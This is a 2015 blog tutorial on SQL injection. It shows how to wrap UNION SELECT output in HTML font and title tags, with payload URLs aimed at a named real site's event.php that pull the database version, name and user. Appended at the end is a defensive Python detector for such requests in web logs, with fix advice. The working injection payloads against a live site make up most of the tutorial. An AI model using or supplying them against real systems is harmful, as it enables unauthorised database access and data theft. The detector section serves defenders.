
Saturday 11 July 2015

Adding HTML Tags in SQL Queries

Adding HTML Tags in SQL Queries - Tutorial by RAi Jee
HTML tags can be used for a lot of fun in SQL queries. We can use HTML tags to make the output colorful. Sometimes we are injecting a site and the vulnerable column is in the title or in the page source, so we can also use HTML tags there to show the output on the page.
So we will start by adding HTML tags to make the output colorful.
Here is an example. We want to print the version in red, so here is our HTML tag for showing the version in red:
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

Let's see the result. Before executing the query, first encode the HTML tag as a hex value, or put a single quote before and after the HTML tag, to make the query executable.

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+

And you can see the version is in red. If we want to use a different color for each command, such as displaying the version in red, the database in green and the user in blue, we will use a different HTML tag for each task.
See the example.
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML tags for each task:
Red color: <font color=red>
Green color: <font color=green>
Blue color: <font color=blue>
So our final query for displaying each task in a different color will be:
Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())
See the example.
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+

And see the picture, all tasks are complete. In this way you can also display tables and columns in different colors.
After displaying SQLi commands in different colors, now let's see how we can display data using HTML tags when our vulnerable column is in the page source or in the title.
When the vulnerable column is in the page source:
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)
So we will use this HTML tag for displaying data on the page if our vulnerable column is in the page source.

HTML TAG: Concat(<font size="8" color="red">,Version(),</font>)

And sometimes our vulnerable column is in the title, so in that case we will use this HTML tag to print data on the web page.

HTML TAG: Concat(</title>,Version())

Use these HTML tags after encoding them as hex values, or put a single quote before and after each HTML tag, to make the query executable.
Happy Injecting!!
Author: Rai Muzammal Hussain a.k.a RAi Jee
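
For defenders, the requests shown in this tutorial leave a recognizable trace in web access logs: a UNION SELECT whose query string carries an HTML tag, either quoted or hex-encoded. The following Python detector is an added example, not part of the original tutorial; the function names are hypothetical and the request targets are constructed samples with made-up paths and values.

```python
import re
from urllib.parse import unquote_plus

UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)")
# Opening or closing tag, e.g. <font color=red> or </title>
HTML_TAG = re.compile(r"</?[a-zA-Z][^<>]*>")


def decode_hex_literals(sql_text):
    """Decode MySQL 0x... literals to text (odd digit counts get a leading 0)."""
    decoded = []
    for digits in HEX_LITERAL.findall(sql_text):
        if len(digits) % 2:
            digits = "0" + digits
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def html_tags_in_injection(request_target):
    """Return HTML tags carried in a UNION SELECT query string, quoted or hex."""
    query = unquote_plus(request_target.partition("?")[2])
    if not UNION_SELECT.search(query):
        return []
    tags = HTML_TAG.findall(query)  # tags sent as quoted string literals
    for value in decode_hex_literals(query):  # tags hidden behind hex encoding
        tags.extend(HTML_TAG.findall(value))
    return tags


# Constructed request targets (hypothetical paths), as logged by a web server
HEX_TITLE = "0x" + "</title>".encode().hex()
SAMPLES = [
    "/event.php?id=444",
    "/event.php?id=-1%27+UNION+SELECT+1,Concat(%27%3Cfont+color=red%3E%27,version()),3--+",
    "/event.php?id=-1%27+UNION+SELECT+1,Concat(" + HEX_TITLE + ",version()),3--+",
]


def scan(targets):
    """Map each flagged request target to the HTML tags found in it."""
    flagged = {}
    for target in targets:
        tags = html_tags_in_injection(target)
        if tags:
            flagged[target] = tags
    return flagged


if __name__ == "__main__":
    for target, tags in scan(SAMPLES).items():
        print(tags, target)
```

A hit means the request both reached a UNION SELECT and tried to control page markup, so the underlying fixes are a parameterized query for the `id` value and HTML-encoding of database values before they are written into the page.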
